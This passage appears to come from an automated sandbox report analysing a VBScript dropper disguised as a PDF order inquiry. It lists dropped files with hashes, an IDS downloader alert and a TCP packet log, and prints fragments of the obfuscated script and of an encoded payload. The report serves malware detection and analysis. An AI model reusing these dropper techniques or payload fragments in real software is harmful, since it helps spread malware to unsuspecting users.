          SHA-512:8D1BADE448F0C53D6EC00BC9FACDBCB1D4B1B7C61E91855206A08BDBF61C6E4A40210574C4193463C8A13AE692DD80897F3CE9E39958472705CF17D77FE9C1D9
          Malicious:false
          Preview:PSMODULECACHE.....$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...

          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):64
          Entropy (8bit):1.1940658735648508
          Encrypted:false
          SSDEEP:3:Nlllulbnolz:NllUc
          MD5:F23953D4A58E404FCB67ADD0C45EB27A
          SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
          SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
          SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
          Malicious:false
          Preview:@...e................................................@..........

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2p3ijzue.2sr.ps1

          Download File
          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a1tzngfy.ix2.psm1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ljpkefvs.vya.psm1

          Download File
          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v45leudp.4xr.ps1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\a4603B1g

          Download File
          Process:C:\Windows\SysWOW64\ktmutil.exe
          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
          Category:dropped
          Size (bytes):114688
          Entropy (8bit):0.9746603542602881
          Encrypted:false
          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
          MD5:780853CDDEAEE8DE70F28A4B255A600B
          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
          Malicious:false
          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Roaming\Ildprve.Fok

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with very long lines (65536), with no line terminators
          Category:dropped
          Size (bytes):485664
          Entropy (8bit):5.958957164951776
          Encrypted:false
          SSDEEP:6144:CcU2T78ASEvDl+X10k7Cs9LGyo6q1THpJsQEbEOvFf9ei0aLPJVUB/DjMPJHNJl:rUA8ASEIT+gLG7JC5flL7Q/Dj0tf
          MD5:83F6C7CFEFC0B01A859B075A863F8C41
          SHA1:04C6B1E50CD35976CB78C892A172C10EDB3E7582
          SHA-256:D57D8BF4BE5C2B0F4C6C2D48622E315BB2E5CAF36E9C6133D53BE3BC10357F47
          SHA-512:FBBF9654006BF253032057E8C3C0DB2323B726FC65D0E9EA5973E081D93DF6FCA53C749CD662F8EAF28E5ED38D1913BC837323323E9CDA1ACF7C811D5F03BCCC
          Malicious:false
          Preview:6wIccHEBm7u1CBgAcQGbcQGbA1wkBOsC5NdxAZu5jMitT3EBm3EBm4Hx+X1MoOsCq5RxAZuB8XW14e9xAZvrAkEr6wLsXOsCFvG6Po7LcOsCf5pxAZtxAZvrAqjRMcrrAu6S6wI+uokUC+sCdfdxAZvR4usCwLZxAZuDwQTrAvd96wIhBoH5C5qYAnzJcQGb6wLU5YtEJATrApz7cQGbicNxAZvrAm8GgcOwxlIBcQGb6wKFaLrV3MqpcQGbcQGbgeoVw0PIcQGb6wKoSIHywBmH4esCqAhxAZtxAZvrAqsKcQGbcQGbiwwQcQGb6wJUDokME3EBm3EBm0JxAZtxAZuB+rAlBQB12OsCh3vrArf1iVwkDOsCzwrrAjsbge0AAwAAcQGbcQGbi1QkCOsCkYbrAj/Ei3wkBHEBm3EBm4nrcQGbcQGbgcOcAAAA6wKWLnEBm1NxAZtxAZtqQOsCi4frAgCcievrAnXGcQGbx4MAAQAAALCzAusC7XjrAqBdgcMAAQAAcQGbcQGbU3EBm3EBm4nr6wJrV+sCdDiJuwQBAADrAtR16wJMg4HDBAEAAOsCzT7rApYkU+sCKMbrAmxMav9xAZvrAlkOg8IF6wJNHOsCGtYx9nEBm3EBmzHJcQGbcQGbixrrApxHcQGbQesCszvrAgSlORwKdfLrAsYh6wIgb0ZxAZvrAjukgHwK+7h12+sCp+PrAizii0QK/HEBm+sCgE0p8HEBm+sCoFj/0usCtM1xAZu6sCUFAOsCRDTrAvUnMcBxAZtxAZuLfCQM6wJEiXEBm4E0B7vCJTtxAZtxAZuDwARxAZvrAmLoOdB15XEBm3EBm4n7cQGb6wJx6//XcQGbcQGbghqs3jK/gYRNeK8+Oi3gp/oppMzSEnmrOgWND1G3DMcwv4FuMieccpPW7rp6GYcbTUPUkJWmuLp6Sz+UGDXmjIm/D/z/zyU2OJsTutfPJURJY8e6/88lc3cMnLrPzyXt50Qo

          Static File Info

          General

          File type:ASCII text, with very long lines (1909), with CRLF line terminators
          Entropy (8bit):5.426258378103233
          TrID:
            File name:Order Inquiry RFQ #278823_pdf.vbs
            File size:10'096 bytes
            MD5:c1e9b6e5c75b875ff959e374ce28fd7f
            SHA1:36e5e0c10f38eaadee2ae715f861a51830f4cb3e
            SHA256:a19a973707d1d16cc53b04c265f87c650fd58e6beeabd9244a95701ed8a0df2d
            SHA512:0abe42fae7e8201c4f15df366a898c8bba393f6794dcb4e67897925682421912611f57fcd3c4694ed0a18e77f2e4f117ff86b568c704402c4550b097b74dce90
            SSDEEP:192:UtTesQ0bUPNPaaBjJ8ngwZHeBhKJc5/DKmrNwkHq:UtCgbUdBjJ8gwNeBhKyIMNwUq
            TLSH:66224BE98C4785D4CA773FFCB4993AA6D5BE266398330011BCEC11A5C640C6D169EB1E
            File Content Preview:..'Udsalgsprisernes? udlggeren, ubehagene? udasedes,......Animalivorabegrimedkidn = LeftB("Pep",141) ....Set nonloxodromic = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\r" + "oot\cimv2")......Set Birta = nonloxodromic.ExecQuery("Select * from

            File Icon

            Icon Hash:68d69b8f86ab9a86

            Network Behavior

            Suricata IDS Alerts

            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
            2024-09-16T14:45:47.825717+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449739142.250.185.110443TCP

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Sep 16, 2024 14:45:05.638149977 CEST49730443192.168.2.4142.250.185.110
            Sep 16, 2024 14:45:05.638183117 CEST44349730142.250.185.110192.168.2.4
            Sep 16, 2024 14:45:05.638324022 CEST49730443192.168.2.4142.250.185.110
            Sep 16, 2024 14:45:05.647398949 CEST49730443192.168.2.4142.250.185.110
            Sep 16, 2024 14:45:05.647411108 CEST44349730142.250.185.110192.168.2.4
            Sep 16, 2024 14:45:06.300698996 CEST44349730142.250.185.110192.168.2.4
            Sep 16, 2024 14:45:06.300816059 CEST49730443192.168.2.4142.250.185.110
            Sep 16, 2024 14:45:06.302225113 CEST44349730142.250.185.110192.168.2.4
            Sep 16, 2024 14:45:06.302289009 CEST49730443192.168.2.4142.250.185.110
            Sep 16, 2024 14:45:06.313852072 CEST49730443192.168.2.4142.250.185.110
            Sep 16, 2024 14:45:06.313901901 CEST44349730142.250.185.110192.168.2.4
            Sep 16, 2024 14:45:06.314294100 CEST44349730142.250.185.110192.168.2.4
            Sep 16, 2024 14:45:06.372977018 CEST49730443192.168.2.4142.250.185.110
            Sep 16, 2024 14:45:06.402050018 CEST49730443192.168.2.4142.250.185.110
            Sep 16, 2024 14:45:06.443435907 CEST44349730142.250.185.110192.168.2.4
            Sep 16, 2024 14:45:06.700781107 CEST44349730142.250.185.110192.168.2.4
            Sep 16, 2024 14:45:06.700875044 CEST49730443192.168.2.4142.250.185.110
            Sep 16, 2024 14:45:06.701642036 CEST44349730142.250.185.110192.168.2.4
            Sep 16, 2024 14:45:06.701750994 CEST44349730142.250.185.110192.168.2.4
            Sep 16, 2024 14:45:06.701833010 CEST49730443192.168.2.4142.250.185.110
            Sep 16, 2024 14:45:06.704961061 CEST49730443192.168.2.4142.250.185.110
            Sep 16, 2024 14:45:10.931416035 CEST49731443192.168.2.4142.250.185.110
            Sep 16, 2024 14:45:10.931452036 CEST44349731142.250.185.110192.168.2.4
            Sep 16, 2024 14:45:10.931716919 CEST49731443192.168.2.4142.250.185.110
            Sep 16, 2024 14:45:10.931988955 CEST49731443192.168.2.4142.250.185.110
            Sep 16, 2024 14:45:10.932004929 CEST44349731142.250.185.110192.168.2.4
            Sep 16, 2024 14:45:11.578788996 CEST44349731142.250.185.110192.168.2.4
            Sep 16, 2024 14:45:11.581778049 CEST49731443192.168.2.4142.250.185.110
            Sep 16, 2024 14:45:11.581801891 CEST44349731142.250.185.110192.168.2.4
            Sep 16, 2024 14:45:11.966032028 CEST44349731142.250.185.110192.168.2.4
            Sep 16, 2024 14:45:11.967592955 CEST44349731142.250.185.110192.168.2.4
            Sep 16, 2024 14:45:11.967653990 CEST49731443192.168.2.4142.250.185.110
            Sep 16, 2024 14:45:11.968019962 CEST49731443192.168.2.4142.250.185.110
            Sep 16, 2024 14:45:11.969150066 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:11.969192982 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:11.969265938 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:11.969600916 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:11.969618082 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:12.656826973 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:12.657033920 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:12.662620068 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:12.662631989 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:12.663012028 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:12.667007923 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:12.711412907 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:14.974729061 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:14.974843979 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:14.980700016 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:14.980858088 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:14.993093967 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:14.993194103 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:14.993217945 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:14.999372005 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:14.999485970 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:14.999495029 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.044825077 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.066987038 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.067209959 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.067312002 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.067393064 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.067401886 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.067557096 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.069966078 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.076391935 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.076502085 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.076508045 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.082819939 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.082912922 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.082951069 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.082957983 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.083018064 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.088953018 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.098016977 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.098140001 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.098233938 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.098257065 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.098500967 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.101758003 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.107481003 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.107603073 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.107676029 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.107697964 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.108102083 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.113223076 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.118894100 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.119010925 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.119015932 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.119045973 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.119148016 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.119155884 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.137868881 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.137975931 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.137984991 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.138015985 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.138094902 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.164486885 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.164674044 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.164729118 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.164747953 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.164872885 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.164923906 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.164932013 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.165128946 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.165183067 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.165191889 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.165296078 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.165416956 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.165426016 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.166062117 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.166115046 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.166122913 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.166543961 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.166625023 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.166634083 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.171432972 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.171513081 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.171520948 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.176328897 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.176417112 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.176424980 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.181045055 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.181359053 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.181368113 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.185616016 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.185698032 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.185705900 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.204469919 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.204514027 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.204572916 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.204572916 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.204587936 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.204623938 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.204799891 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.204847097 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.204857111 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.204868078 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.204957962 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.204967022 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.208592892 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.208655119 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.208668947 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.212609053 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.212645054 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.212660074 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.212670088 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.212775946 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.218182087 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.220714092 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.220801115 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.220808029 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.224505901 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.224531889 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.224555016 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.224564075 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.224607944 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.235331059 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.237380981 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.237420082 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.237457037 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.237484932 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.237545967 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.237545967 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.237580061 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.237643003 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.239022970 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.258702040 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.258759975 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.258773088 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.258857965 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.258914948 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.258923054 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.259031057 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.259109020 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.259160042 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.259169102 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.259260893 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.259314060 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.259321928 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.259366035 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.259407043 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.259555101 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.259617090 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.259624958 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.259706020 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.259759903 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.259768009 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.259838104 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.259885073 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.259893894 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.266237020 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.266288042 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.266297102 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.266386032 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.266465902 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.266616106 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.266648054 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.266714096 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.269587040 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.269763947 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.269825935 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.269835949 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.274369001 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.274451017 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.274532080 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.274532080 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.274564028 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.274593115 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.279052019 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.279144049 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.279211998 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.279225111 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.279248953 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.279381037 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.279417992 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.279452085 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.279464960 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.283636093 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.283708096 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.283715010 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.283755064 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.283920050 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.284405947 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.288451910 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.288535118 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.288602114 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.288610935 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.288633108 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.288664103 CEST49732443192.168.2.4142.250.185.193
